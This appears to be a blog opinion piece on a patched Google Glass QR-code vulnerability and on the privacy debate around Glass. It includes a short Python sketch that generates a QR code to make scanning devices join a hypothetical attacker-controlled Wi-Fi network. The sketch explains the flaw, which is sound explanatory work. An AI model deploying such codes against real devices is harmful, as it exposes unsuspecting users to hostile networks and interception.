The hacking of Google Glass commences.
There are a few things to note. In the interest of full disclosure, I am of the opinion that Google Glass is unnecessary and creepy. At the same time, I understand that Google, like the other companies working on similar projects, has every right to produce and market these and other wearable computing devices.
It is no surprise that a new IP-based computing platform is attracting hackers. In this case, the approach was to subvert the QR codes that Glass reads in order to carry out its owner’s instructions:
Because Glass was programmed to process every QR code that it detected, an attacker could abuse it by forcing the devices to connect to a malicious Wi-Fi access point or Bluetooth connection.
The problem was detected by Lookout Security, which informed Google. Google did the right thing and patched the vulnerability, according to the story.
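To make the mechanics concrete, here is a minimal sketch of the kind of payload involved. It assumes the de facto ZXing-style “WIFI:” QR format that Android devices auto-process; the story does not specify the exact payload Lookout used, and the network name, passphrase and filename below are hypothetical. The third-party `qrcode` Python library is used purely for illustration.

```python
# A minimal sketch of a QR code carrying network-join instructions.
# Assumptions: the ZXing-style "WIFI:" payload format; the access point
# name, passphrase and filename are hypothetical.
import qrcode

ssid = "FreeCafeWiFi"        # hypothetical attacker-controlled access point
passphrase = "opensesame"    # its WPA passphrase

# ZXing Wi-Fi payload: T = auth type, S = SSID, P = passphrase
payload = f"WIFI:T:WPA;S:{ssid};P:{passphrase};;"

# A device that silently acts on every QR code it sees, as Glass did
# before the patch, would join this network the moment the code entered
# its camera's field of view.
qrcode.make(payload).save("poster.png")
```

The point of the sketch is that the “exploit” requires no code running on the target at all; the attack surface is simply the device’s willingness to act on anything it scans.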
Security and privacy drew a great deal of attention when Google Glass was first introduced. Matt McGee at Marketing Land provides some good background. The dust has settled somewhat, but the topic is worth revisiting in light of the Lookout Security research.
In recent years, hacking has shifted from lone-wolf types acting on a variety of impulses (some mentally healthy, some not) to organized groups squarely focused on making money. The pendulum has swung, but both groups still exist, and Google Glass offers a lot to each: exposing suspected corruption and illegality, personal bribery, industrial espionage and other nasty doings.
It is interesting that the Edward Snowden affair occurred after the introduction of Google Glass. The two are not directly related and, of course, there is a wide variety of opinion on what Snowden did. But the bottom line in this context is that there are plenty of people who will use technology to divulge information regardless of the law.
Google, of course, is being raked over the coals. Last month, The Huffington Post reported that pointed questions from around the world have been delivered to the company:
The letter, co-signed by 10 privacy and data commissioners from Mexico, Israel, Canada, New Zealand, Australia, Switzerland and a Dutch representative from the European Commission, outlined eight questions concerning Glass’ privacy safeguards. They ranged from what information Glass collects and how Google uses that data, to how Glass might incorporate facial recognition in the future.
Things are no easier at home. The Washington Post reported that in May the House Bipartisan Privacy Caucus sent the company questions about the privacy and security of Google Glass. The answers, apparently, didn’t hit the mark:
But Rep. Joe Barton (R-Tex.), co-chairman of the caucus, said that Google has failed to answer the key question: How can it ensure the privacy of passersby who have not agreed to be photographed or videotaped?
Barton’s question is a good one. According to the story, Google points out that overt gestures are required to activate Glass and that a persistent glow makes it obvious when the device is operating. What it doesn’t say, however, is how it prevents hackers from disabling those safeguards.
Google is not the guilty party here; it is simply an easy target. In the final analysis, it is doing what companies do: developing products it thinks will make money within the boundaries of existing law. Companies, to a large degree, are neither moral nor immoral. They are amoral. The challenge is that the technology now available is inherently dangerous.
Finally, it is important to recognize that this goes well beyond Google. The company is a bellwether, but there are many others in the wearable computing sector. The danger is that their approach to security and privacy may be less stringent than Google’s simply because they operate under the radar. Any framework addressing these issues must be codified in such a way that every player is required to comply.